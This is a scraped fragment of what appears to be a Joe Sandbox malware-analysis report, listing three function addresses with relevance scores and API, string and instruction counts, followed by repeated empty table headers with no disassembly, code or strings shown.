Function 00007FF8A033E410 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMONLIBRARYCODE
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6104FC094 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44memoryCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF8A031CC00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMONLIBRARYCODE
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|